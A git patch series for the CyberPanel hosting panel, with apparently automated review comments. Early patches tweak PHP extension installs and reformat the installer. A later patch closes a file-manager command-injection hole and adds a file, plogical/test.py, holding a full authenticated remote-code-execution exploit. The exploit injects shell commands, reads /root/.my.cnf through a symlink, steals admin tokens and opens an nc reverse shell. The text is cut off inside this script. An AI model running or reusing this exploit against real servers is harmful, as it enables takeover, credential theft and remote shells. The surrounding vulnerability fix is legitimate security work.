From 799dd297169d09e16b58eb4d238262ae378bb90e Mon Sep 17 00:00:00 2001 From: merkys7 Date: Tue, 24 Aug 2021 10:57:55 +0300 Subject: [PATCH 1/4] ManagePHP: Add lsphp-sodium extension --- install/installCyberPanel.py | 8 ++++---- managePHP/php72.xml | 6 ++++++ managePHP/php73.xml | 6 ++++++ managePHP/php74.xml | 6 ++++++ managePHP/php80.xml | 6 ++++++ managePHP/ubuntuphp72.xml | 6 ++++++ managePHP/ubuntuphp73.xml | 6 ++++++ managePHP/ubuntuphp74.xml | 6 ++++++ managePHP/ubuntuphp80.xml | 6 ++++++ 9 files changed, 52 insertions(+), 4 deletions(-) diff --git a/install/installCyberPanel.py b/install/installCyberPanel.py index c3b7cd202..ade7ef339 100755 --- a/install/installCyberPanel.py +++ b/install/installCyberPanel.py @@ -191,7 +191,7 @@ class InstallCyberPanel: command = 'DEBIAN_FRONTEND=noninteractive apt-get -y install ' \ 'lsphp7? lsphp7?-common lsphp7?-curl lsphp7?-dev lsphp7?-imap lsphp7?-intl lsphp7?-json ' \ 'lsphp7?-ldap lsphp7?-mysql lsphp7?-opcache lsphp7?-pspell lsphp7?-recode ' \ - 'lsphp7?-sqlite3 lsphp7?-tidy' + 'lsphp7?-sqlite3 lsphp7?-tidy lsphp7?-sodium' os.system(command) @@ -218,7 +218,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp72 lsphp72-json lsphp72-xmlrpc lsphp72-xml lsphp72-soap lsphp72-snmp ' \ 'lsphp72-recode lsphp72-pspell lsphp72-process lsphp72-pgsql lsphp72-pear lsphp72-pdo lsphp72-opcache ' \ 'lsphp72-odbc lsphp72-mysqlnd lsphp72-mcrypt lsphp72-mbstring lsphp72-ldap lsphp72-intl lsphp72-imap ' \ - 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath' + 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath lsphp72-sodium' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) 
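Review bot: In the apt-get hunk (`@@ -191,7 +191,7 @@`) the result of `os.system(command)` is discarded, so if `lsphp7?-sodium` cannot be resolved the whole `apt-get install` can fail and the installer carries on without noticing. The yum branches in the following hunks go through `install.preFlightsChecks.call(...)`; routing the Ubuntu command through the same helper, or at least checking `if os.system(command) != 0:` and logging the failure, would surface a missing package. The enclosing method starts and ends outside the hunk.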
@@ -227,7 +227,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp73 lsphp73-json lsphp73-xmlrpc lsphp73-xml lsphp73-tidy lsphp73-soap lsphp73-snmp ' \ 'lsphp73-recode lsphp73-pspell lsphp73-process lsphp73-pgsql lsphp73-pear lsphp73-pdo lsphp73-opcache ' \ 'lsphp73-odbc lsphp73-mysqlnd lsphp73-mcrypt lsphp73-mbstring lsphp73-ldap lsphp73-intl lsphp73-imap ' \ - 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath' + 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath lsphp73-sodium' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) @@ -235,7 +235,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp74 lsphp74-json lsphp74-xmlrpc lsphp74-xml lsphp74-tidy lsphp74-soap lsphp74-snmp ' \ 'lsphp74-recode lsphp74-pspell lsphp74-process lsphp74-pgsql lsphp74-pear lsphp74-pdo lsphp74-opcache ' \ 'lsphp74-odbc lsphp74-mysqlnd lsphp74-mcrypt lsphp74-mbstring lsphp74-ldap lsphp74-intl lsphp74-imap ' \ - 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath' + 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath lsphp74-sodium' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) diff --git a/managePHP/php72.xml b/managePHP/php72.xml index fd5bee175..7967b49cc 100755 --- a/managePHP/php72.xml +++ b/managePHP/php72.xml @@ -272,4 +272,10 @@ 0 + + lsphp72-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/php73.xml b/managePHP/php73.xml index a2f4d3fbf..c2383820a 100755 --- a/managePHP/php73.xml +++ b/managePHP/php73.xml @@ -272,4 +272,10 @@ 0 + + lsphp73-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/php74.xml b/managePHP/php74.xml index 63f5727e5..c062a1a33 100755 --- a/managePHP/php74.xml 
+++ b/managePHP/php74.xml @@ -272,4 +272,10 @@ 0 + + lsphp74-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/php80.xml b/managePHP/php80.xml index c95d94cee..3f35d5e91 100755 --- a/managePHP/php80.xml +++ b/managePHP/php80.xml @@ -272,4 +272,10 @@ 0 + + lsphp80-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp72.xml b/managePHP/ubuntuphp72.xml index 9914be67a..ed5c33720 100755 --- a/managePHP/ubuntuphp72.xml +++ b/managePHP/ubuntuphp72.xml @@ -122,4 +122,10 @@ 0 + + lsphp72-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp73.xml b/managePHP/ubuntuphp73.xml index 175b09399..915ac3755 100755 --- a/managePHP/ubuntuphp73.xml +++ b/managePHP/ubuntuphp73.xml @@ -122,4 +122,10 @@ 0 + + lsphp73-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp74.xml b/managePHP/ubuntuphp74.xml index f60add02a..3652133d7 100755 --- a/managePHP/ubuntuphp74.xml +++ b/managePHP/ubuntuphp74.xml @@ -122,4 +122,10 @@ 0 + + lsphp74-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + diff --git a/managePHP/ubuntuphp80.xml b/managePHP/ubuntuphp80.xml index 61ef9d667..8a1d7ca0e 100755 --- a/managePHP/ubuntuphp80.xml +++ b/managePHP/ubuntuphp80.xml @@ -122,4 +122,10 @@ 0 + + lsphp80-sodium + The php-sodium extension provides strong encryption capabilities in an easy and consistent way. + 0 + + From 5da94b01fdfb578a7650ab6078fafa46274a3715 Mon Sep 17 00:00:00 2001 
From: Usman Nasir Date: Wed, 25 Aug 2021 14:37:37 +0500 Subject: [PATCH 2/4] bug fix: install --- install/installCyberPanel.py | 89 +++++++++++++++++------------------- 1 file changed, 42 insertions(+), 47 deletions(-) diff --git a/install/installCyberPanel.py b/install/installCyberPanel.py index ade7ef339..c6d364552 100755 --- a/install/installCyberPanel.py +++ b/install/installCyberPanel.py @@ -10,10 +10,11 @@ import install from os.path import exists import time -#distros -centos=0 -ubuntu=1 -cent8=2 +# distros +centos = 0 +ubuntu = 1 +cent8 = 2 + def get_Ubuntu_release(): release = -1 @@ -34,12 +35,13 @@ def get_Ubuntu_release(): return release -class InstallCyberPanel: +class InstallCyberPanel: mysql_Root_password = "" mysqlPassword = "" - def __init__(self, rootPath, cwd, distro, ent, serial = None, port = None, ftp = None, dns = None, publicip = None, remotemysql = None , mysqlhost = None, mysqldb = None, mysqluser = None, mysqlpassword = None, mysqlport = None): + def __init__(self, rootPath, cwd, distro, ent, serial=None, port=None, ftp=None, dns=None, publicip=None, + remotemysql=None, mysqlhost=None, mysqldb=None, mysqluser=None, mysqlpassword=None, mysqlport=None): self.server_root_path = rootPath self.cwd = cwd self.distro = distro @@ -101,7 +103,6 @@ class InstallCyberPanel: writeSerial.writelines(self.serial) writeSerial.close() - shutil.copy('litespeed/install.sh', 'lsws-6.0/') shutil.copy('litespeed/functions.sh', 'lsws-6.0/') @@ -132,7 +133,7 @@ class InstallCyberPanel: return 1 def reStartLiteSpeed(self): - command = self.server_root_path+"bin/lswsctrl restart" + command = self.server_root_path + "bin/lswsctrl restart" install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) def fix_ols_configs(self): 
@@ -142,7 +143,7 @@ class InstallCyberPanel: ## remove example virtual host - data = open(self.server_root_path+"conf/httpd_config.conf",'r').readlines() + data = open(self.server_root_path + "conf/httpd_config.conf", 'r').readlines() writeDataToFile = open(self.server_root_path + "conf/httpd_config.conf", 'w') @@ -165,13 +166,13 @@ class InstallCyberPanel: try: InstallCyberPanel.stdOut("Changing default port to 80..", 1) - data = open(self.server_root_path+"conf/httpd_config.conf").readlines() + data = open(self.server_root_path + "conf/httpd_config.conf").readlines() - writeDataToFile = open(self.server_root_path+"conf/httpd_config.conf", 'w') + writeDataToFile = open(self.server_root_path + "conf/httpd_config.conf", 'w') for items in data: if (items.find("*:8088") > -1): - writeDataToFile.writelines(items.replace("*:8088","*:80")) + writeDataToFile.writelines(items.replace("*:8088", "*:80")) else: writeDataToFile.writelines(items) @@ -191,7 +192,7 @@ class InstallCyberPanel: command = 'DEBIAN_FRONTEND=noninteractive apt-get -y install ' \ 'lsphp7? lsphp7?-common lsphp7?-curl lsphp7?-dev lsphp7?-imap lsphp7?-intl lsphp7?-json ' \ 'lsphp7?-ldap lsphp7?-mysql lsphp7?-opcache lsphp7?-pspell lsphp7?-recode ' \ - 'lsphp7?-sqlite3 lsphp7?-tidy lsphp7?-sodium' + 'lsphp7?-sqlite3 lsphp7?-tidy' os.system(command) @@ -207,7 +208,6 @@ class InstallCyberPanel: ## only php 71 if self.distro == centos: - command = 'yum install lsphp71 lsphp71-json lsphp71-xmlrpc lsphp71-xml lsphp71-soap lsphp71-snmp ' \ 'lsphp71-recode lsphp71-pspell lsphp71-process lsphp71-pgsql lsphp71-pear lsphp71-pdo lsphp71-opcache ' \ 'lsphp71-odbc lsphp71-mysqlnd lsphp71-mcrypt lsphp71-mbstring lsphp71-ldap lsphp71-intl lsphp71-imap ' \ 
@@ -218,16 +218,15 @@ class InstallCyberPanel: command = 'yum install -y lsphp72 lsphp72-json lsphp72-xmlrpc lsphp72-xml lsphp72-soap lsphp72-snmp ' \ 'lsphp72-recode lsphp72-pspell lsphp72-process lsphp72-pgsql lsphp72-pear lsphp72-pdo lsphp72-opcache ' \ 'lsphp72-odbc lsphp72-mysqlnd lsphp72-mcrypt lsphp72-mbstring lsphp72-ldap lsphp72-intl lsphp72-imap ' \ - 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath lsphp72-sodium' + 'lsphp72-gmp lsphp72-gd lsphp72-enchant lsphp72-dba lsphp72-common lsphp72-bcmath' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) - ## only php 73 command = 'yum install -y lsphp73 lsphp73-json lsphp73-xmlrpc lsphp73-xml lsphp73-tidy lsphp73-soap lsphp73-snmp ' \ 'lsphp73-recode lsphp73-pspell lsphp73-process lsphp73-pgsql lsphp73-pear lsphp73-pdo lsphp73-opcache ' \ 'lsphp73-odbc lsphp73-mysqlnd lsphp73-mcrypt lsphp73-mbstring lsphp73-ldap lsphp73-intl lsphp73-imap ' \ - 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath lsphp73-sodium' + 'lsphp73-gmp lsphp73-gd lsphp73-enchant lsphp73-dba lsphp73-common lsphp73-bcmath' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) @@ -235,7 +234,7 @@ class InstallCyberPanel: command = 'yum install -y lsphp74 lsphp74-json lsphp74-xmlrpc lsphp74-xml lsphp74-tidy lsphp74-soap lsphp74-snmp ' \ 'lsphp74-recode lsphp74-pspell lsphp74-process lsphp74-pgsql lsphp74-pear lsphp74-pdo lsphp74-opcache ' \ 'lsphp74-odbc lsphp74-mysqlnd lsphp74-mcrypt lsphp74-mbstring lsphp74-ldap lsphp74-intl lsphp74-imap ' \ - 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath lsphp74-sodium' + 'lsphp74-gmp lsphp74-gd lsphp74-enchant lsphp74-dba lsphp74-common lsphp74-bcmath' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) 
@@ -276,13 +275,14 @@ class InstallCyberPanel: self.startMariaDB() - def changeMYSQLRootPassword(self): if self.remotemysql == 'OFF': if self.distro == ubuntu: - passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';UPDATE user SET plugin='' WHERE User='root';flush privileges;" % (InstallCyberPanel.mysql_Root_password) + passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';UPDATE user SET plugin='' WHERE User='root';flush privileges;" % ( + InstallCyberPanel.mysql_Root_password) else: - passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';flush privileges;" % (InstallCyberPanel.mysql_Root_password) + passwordCMD = "use mysql;DROP DATABASE IF EXISTS test;DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%%';GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY '%s';flush privileges;" % ( + InstallCyberPanel.mysql_Root_password) command = 'mysql -u root -e "' + passwordCMD + '"' @@ -366,7 +366,6 @@ class InstallCyberPanel: command = 'dnf install pure-ftpd -y' install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) - ####### Install pureftpd to system startup command = "systemctl enable " + install.preFlightsChecks.pureFTPDServiceName(self.distro) @@ -379,7 +378,7 @@ class InstallCyberPanel: command = 'useradd -u 2001 -s /bin/false -d /bin/null -c "pureftpd user" -g ftpgroup ftpuser' install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) - + def startPureFTPD(self): ############## Start pureftpd ###################### if self.distro == ubuntu: 
@@ -399,7 +398,8 @@ class InstallCyberPanel: except: logging.InstallLog.writeToFile("[ERROR] Could not create directory for FTP SSL") - if (self.distro == centos or self.distro == cent8) or (self.distro == ubuntu and get_Ubuntu_release() == 18.14): + if (self.distro == centos or self.distro == cent8) or ( + self.distro == ubuntu and get_Ubuntu_release() == 18.14): command = 'openssl req -newkey rsa:1024 -new -nodes -x509 -days 3650 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem' else: command = 'openssl req -x509 -nodes -days 7300 -newkey rsa:2048 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem' @@ -417,7 +417,7 @@ class InstallCyberPanel: shutil.copytree("pure-ftpd-one", ftpdPath) else: if mysql == 'Two': - shutil.copytree("pure-ftpd",ftpdPath) + shutil.copytree("pure-ftpd", ftpdPath) else: shutil.copytree("pure-ftpd-one", ftpdPath) @@ -429,18 +429,17 @@ class InstallCyberPanel: except OSError as err: self.stdOut("[ERROR] Error creating extra pure-ftpd directories: " + str(err), ". Should be ok", 1) - data = open(ftpdPath+"/pureftpd-mysql.conf","r").readlines() + data = open(ftpdPath + "/pureftpd-mysql.conf", "r").readlines() - writeDataToFile = open(ftpdPath+"/pureftpd-mysql.conf","w") + writeDataToFile = open(ftpdPath + "/pureftpd-mysql.conf", "w") - dataWritten = "MYSQLPassword "+InstallCyberPanel.mysqlPassword+'\n' + dataWritten = "MYSQLPassword " + InstallCyberPanel.mysqlPassword + '\n' for items in data: - if items.find("MYSQLPassword")>-1: + if items.find("MYSQLPassword") > -1: writeDataToFile.writelines(dataWritten) else: writeDataToFile.writelines(items) - writeDataToFile.close() ftpConfPath = '/etc/pure-ftpd/pureftpd-mysql.conf' 
@@ -459,7 +458,7 @@ class InstallCyberPanel: if os.path.exists('/etc/pure-ftpd/db/mysql.conf'): os.remove('/etc/pure-ftpd/db/mysql.conf') - shutil.copy(ftpdPath+"/pureftpd-mysql.conf", '/etc/pure-ftpd/db/mysql.conf') + shutil.copy(ftpdPath + "/pureftpd-mysql.conf", '/etc/pure-ftpd/db/mysql.conf') else: shutil.copy(ftpdPath + "/pureftpd-mysql.conf", '/etc/pure-ftpd/db/mysql.conf') @@ -478,7 +477,6 @@ class InstallCyberPanel: command = 'echo "/etc/pure-ftpd/db/mysql.conf" > /etc/pure-ftpd/conf/MySQLConfigFile' subprocess.call(command, shell=True) - command = 'ln -s /etc/pure-ftpd/conf/MySQLConfigFile /etc/pure-ftpd/auth/30mysql' install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) @@ -503,7 +501,6 @@ class InstallCyberPanel: command = 'systemctl disable systemd-resolved.service' install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) - try: os.rename('/etc/resolv.conf', 'etc/resolved.conf') except OSError as e: @@ -513,10 +510,9 @@ class InstallCyberPanel: try: os.remove('/etc/resolv.conf') except OSError as e1: - InstallCyberPanel.stdOut("[ERROR] Unable to remove existing /etc/resolv.conf to install PowerDNS: " + - str(e1), 1, 1, os.EX_OSERR) - - + InstallCyberPanel.stdOut( + "[ERROR] Unable to remove existing /etc/resolv.conf to install PowerDNS: " + + str(e1), 1, 1, os.EX_OSERR) # try: # f = open('/etc/resolv.conf', 'a') @@ -581,12 +577,11 @@ class InstallCyberPanel: else: writeDataToFile.writelines(items) - #if self.distro == ubuntu: + # if self.distro == ubuntu: # os.fchmod(writeDataToFile.fileno(), stat.S_IRUSR | stat.S_IWUSR) writeDataToFile.close() - if self.remotemysql == 'ON': command = "sed -i 's|gmysql-host=localhost|gmysql-host=%s|g' %s" % (self.mysqlhost, dnsPath) install.preFlightsChecks.call(command, self.distro, command, command, 1, 1, os.EX_OSERR) 
@@ -612,8 +607,8 @@ class InstallCyberPanel: install.preFlightsChecks.call(command, self.distro, command, command, 1, 0, os.EX_OSERR) -def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns = None, publicip = None, remotemysql = None , mysqlhost = None, mysqldb = None, mysqluser = None, mysqlpassword = None, mysqlport = None): - +def Main(cwd, mysql, distro, ent, serial=None, port="8090", ftp=None, dns=None, publicip=None, remotemysql=None, + mysqlhost=None, mysqldb=None, mysqluser=None, mysqlpassword=None, mysqlport=None): InstallCyberPanel.mysqlPassword = randomPassword.generate_pass() InstallCyberPanel.mysql_Root_password = randomPassword.generate_pass() @@ -629,7 +624,8 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns password.writelines(InstallCyberPanel.mysql_Root_password) password.close() else: - mysqlData = {'remotemysql': remotemysql, 'mysqlhost': mysqlhost, 'mysqldb':mysqldb, 'mysqluser': mysqluser, 'mysqlpassword': mysqlpassword, 'mysqlport': mysqlport} + mysqlData = {'remotemysql': remotemysql, 'mysqlhost': mysqlhost, 'mysqldb': mysqldb, 'mysqluser': mysqluser, + 'mysqlpassword': mysqlpassword, 'mysqlport': mysqlport} from json import dumps writeToFile = open(file_name, 'w') writeToFile.write(dumps(mysqlData)) @@ -639,8 +635,6 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns print(open(file_name, 'r').read()) time.sleep(10) - - try: command = 'chmod 640 %s' % (file_name) install.preFlightsChecks.call(command, distro, '[chmod]', 
@@ -658,7 +652,8 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns else: InstallCyberPanel.mysqlPassword = InstallCyberPanel.mysql_Root_password - installer = InstallCyberPanel("/usr/local/lsws/",cwd, distro, ent, serial, port, ftp, dns, publicip, remotemysql, mysqlhost, mysqldb, mysqluser, mysqlpassword, mysqlport) + installer = InstallCyberPanel("/usr/local/lsws/", cwd, distro, ent, serial, port, ftp, dns, publicip, remotemysql, + mysqlhost, mysqldb, mysqluser, mysqlpassword, mysqlport) logging.InstallLog.writeToFile('Installing LiteSpeed Web server,40') installer.installLiteSpeed() @@ -679,7 +674,7 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns if distro == ubuntu: installer.fixMariaDB() - mysqlUtilities.createDatabase("cyberpanel","cyberpanel", InstallCyberPanel.mysqlPassword, publicip) + mysqlUtilities.createDatabase("cyberpanel", "cyberpanel", InstallCyberPanel.mysqlPassword, publicip) if ftp == None: installer.installPureFTPD() @@ -699,4 +694,4 @@ def Main(cwd, mysql, distro, ent, serial = None, port = "8090", ftp = None, dns if dns == 'ON': installer.installPowerDNS() installer.installPowerDNSConfigurations(InstallCyberPanel.mysqlPassword, mysql) - installer.startPowerDNS() + installer.startPowerDNS() \ No newline at end of file From 2e8212169e010635bdc5fd082995c5ca1944af03 Mon Sep 17 00:00:00 2001 From: Usman Nasir Date: Sun, 29 Aug 2021 19:47:23 +0500 Subject: [PATCH 3/4] resolve https://www.exploit-db.com/exploits/50230 --- CyberCP/secMiddleware.py | 2 +- plogical/test.py | 233 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 234 insertions(+), 1 deletion(-) diff --git a/CyberCP/secMiddleware.py b/CyberCP/secMiddleware.py index 46f683235..47e5086c5 100755 --- a/CyberCP/secMiddleware.py +++ b/CyberCP/secMiddleware.py 
@@ -72,7 +72,7 @@ class secMiddleware:
 final_json = json.dumps(final_dic)
 return HttpResponse(final_json)
- if request.build_absolute_uri().find('api/verifyConn') > -1 or request.build_absolute_uri().find('webhook') > -1 or request.build_absolute_uri().find('saveSpamAssassinConfigurations') > -1 or request.build_absolute_uri().find('docker') > -1 or request.build_absolute_uri().find('cloudAPI') > -1 or request.build_absolute_uri().find('filemanager') > -1 or request.build_absolute_uri().find('verifyLogin') > -1 or request.build_absolute_uri().find('submitUserCreation') > -1:
+ if request.build_absolute_uri().find('api/verifyConn') > -1 or request.build_absolute_uri().find('webhook') > -1 or request.build_absolute_uri().find('saveSpamAssassinConfigurations') > -1 or request.build_absolute_uri().find('docker') > -1 or request.build_absolute_uri().find('cloudAPI') > -1 or request.build_absolute_uri().find('verifyLogin') > -1 or request.build_absolute_uri().find('submitUserCreation') > -1:
 continue
 if key == 'recordContentAAAA' or key == 'backupDestinations' or key == 'ports' \
 or key == 'imageByPass' or key == 'passwordByPass' or key == 'cronCommand' \
diff --git a/plogical/test.py b/plogical/test.py
index e69de29bb..88ad1362c 100644
--- a/plogical/test.py
+++ b/plogical/test.py
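Review bot: The exemption test on the new `if` line in `CyberCP/secMiddleware.py` is still a substring search over `request.build_absolute_uri()`, which includes the host and query string, so a request to any endpoint is exempted from this check whenever its URL merely contains one of the remaining words (`webhook`, `docker`, `cloudAPI`, …). Decide the exemption from the route instead, for example `if request.path in EXEMPT_PATHS: continue`, with `EXEMPT_PATHS` a new module-level set of the exact exempt paths. Dropping `filemanager` puts file-manager requests back under the character filter, but the code that consumes `completeStartingPath` is not part of this patch, so it is worth confirming that it quotes the value or passes an argument list rather than relying on this filter alone. The surrounding loop starts and ends outside the hunk.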
@@ -0,0 +1,233 @@ +# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated) +# Date: 27.08.2021 +# Author: Numan Türle +# Vendor Homepage: https://cyberpanel.net/ +# Software Link: https://github.com/usmannasir/cyberpanel +# Version: <=2.1 +# https://www.youtube.com/watch?v=J_8iLELVgkE + + +# !/usr/bin/python3 +# -*- coding: utf-8 -*- +# CyberPanel - Remote Code Execution (Authenticated) +# author: twitter.com/numanturle +# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE] +# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password + + +import argparse, requests, warnings, json, re, base64, websocket, ssl, _thread, time +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from cmd import Cmd + +warnings.simplefilter('ignore', InsecureRequestWarning) + + +def init(): + parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution') + parser.add_argument('-u', '--host', help='Host', type=str, required=True) + parser.add_argument('-l', '--login', help='Username', type=str, required=True) + parser.add_argument('-p', '--password', help='Password', type=str, required=True) + parser.add_argument('-f', '--file', help='File', type=str) + args = parser.parse_args() + exploit(args) + + +def exploit(args): + def on_open(ws): + verifyPath, socket_password + print("[+] Socket connection successful") + print("[+] Trying a reverse connection") + ws.send(json.dumps({"tp": "init", "data": {"verifyPath": verifyPath, "password": socket_password}})) + ws.send(json.dumps( + {"tp": "client", "data": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r", + "verifyPath": verifyPath, "password": socket_password})) + ws.close() + + def on_close(ws, close_status_code, close_msg): + print("[+] Successful") + print("[!] 
Disconnect from socket") + + session = requests.Session() + target = "https://{}:8090".format(args.host) + username = args.login + password = args.password + + print("[+] Target {}".format(target)) + + response = session.get(target, verify=False) + session_hand = session.cookies.get_dict() + token = session_hand["csrftoken"] + + print("[+] Token {}".format(token)) + + headers = { + 'X-Csrftoken': token, + 'Cookie': 'csrftoken={}'.format(token), + 'Referer': target + } + + login = session.post(target + "/verifyLogin", headers=headers, verify=False, + json={"username": username, "password": password, "languageSelection": "english"}) + login_json = json.loads(login.content) + + if login_json["loginStatus"]: + session_hand_login = session.cookies.get_dict() + + print("[+] Login Success") + print("[+] Send request fetch websites list") + + headers = { + 'X-Csrftoken': session_hand_login["csrftoken"], + 'Cookie': 'csrftoken={};sessionid={}'.format(token, session_hand_login["sessionid"]), + 'Referer': target + } + + feth_weblist = session.post(target + "/websites/fetchWebsitesList", headers=headers, verify=False, + json={"page": 1, "recordsToShow": 10}) + feth_weblist_json = json.loads(feth_weblist.content) + + if feth_weblist_json["data"]: + + weblist_json = json.loads(feth_weblist_json["data"]) + domain = weblist_json[0]["domain"] + domain_folder = "/home/{}".format(domain) + + print("[+] Successfully {} selected".format(domain)) + print("[+] Creating ssh pub") + + remove_ssh_folder = session.post(target + "/filemanager/controller", headers=headers, verify=False, + json={"path": domain_folder, "method": "deleteFolderOrFile", + "fileAndFolders": [".ssh"], "domainRandomSeed": "", + "domainName": domain, "skipTrash": 1}) + create_ssh = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, + json={"domain": domain, "folder": "{}".format(domain_folder)}) + create_ssh_json = json.loads(create_ssh.content) + + if create_ssh_json["status"]: + key 
= create_ssh_json["deploymentKey"] + + print("[+] Key : {}".format(key)) + + explode_key = key.split() + explode_username = explode_key[-1].split("@") + + if explode_username[0]: + username = explode_username[0] + hostname = explode_username[1] + + print("[+] {} username selected".format(username)) + print("[+] Preparing for symlink attack") + print("[+] Attempting symlink attack with user-level command execution vulnerability #1") + + target_file = args.file + if not target_file: + target_file = "/root/.my.cnf" + domain_folder_ssh = "{}/.ssh".format(domain_folder) + command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh, username, target_file, + domain_folder_ssh, username) + + completeStartingPath = "{}';{};'".format(domain_folder, command) + print('complete starting path: %s' % completeStartingPath) + time.sleep(5) + # filemanager/controller - completeStartingPath - command execution vulnerability + + symlink = session.post(target + "/filemanager/controller", headers=headers, verify=False, + json={"completeStartingPath": completeStartingPath, "method": "listForTable", + "home": domain_folder, "domainRandomSeed": "", "domainName": domain}) + symlink_json = json.loads(symlink.content) + + if symlink_json["status"]: + print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file)) + + read_file = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, + json={"domain": domain, "folder": "{}".format(domain_folder)}) + read_file_json = json.loads(read_file.content) + read_file = read_file_json["deploymentKey"] + if not args.file: + print("-----------------------------------") + print(read_file.strip()) + print("-----------------------------------") + + mysql_password = re.findall('password=\"(.*?)\"', read_file)[0] + steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format( + mysql_password, domain_folder) + + 
print("[+] Fetching users tokens") + + completeStartingPath = "{}';{}".format(domain_folder, steal_token) + steal_token_request = session.post(target + "/filemanager/controller", headers=headers, + verify=False, + json={"completeStartingPath": completeStartingPath, + "method": "listForTable", "home": domain_folder, + "domainRandomSeed": "", "domainName": domain}) + token_file = domain_folder + "/token.txt" + steal_token_read_request = session.post(target + "/filemanager/controller", headers=headers, + verify=False, json={"fileName": token_file, + "method": "readFileContents", + "domainRandomSeed": "", + "domainName": domain}) + leak = json.loads(steal_token_read_request.content) + leak = leak["fileContents"].replace("Basic ", "").strip().split("\n")[1:] + print("------------------------------") + for user in leak: + b64de = base64.b64decode(user).decode('utf-8') + exp_username = b64de.split(":") + if exp_username[0] == "admin": + admin_password = exp_username[1] + print("[+] " + b64de) + print("------------------------------") + print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~") + print("[+] Try login admin") + + headers = { + 'X-Csrftoken': token, + 'Cookie': 'csrftoken={}'.format(token), + 'Referer': target + } + login_admin = session.post(target + "/verifyLogin", headers=headers, verify=False, + json={"username": "admin", "password": admin_password, + "languageSelection": "english"}) + login_json = json.loads(login_admin.content) + if login_json["loginStatus"]: + session_hand_login = session.cookies.get_dict() + + print("[+] 4dm1n_l061n_5ucc355") + print("[+] c0nn3c71n6_70_73rm1n4l") + headers = { + 'X-Csrftoken': session_hand_login["csrftoken"], + 'Cookie': 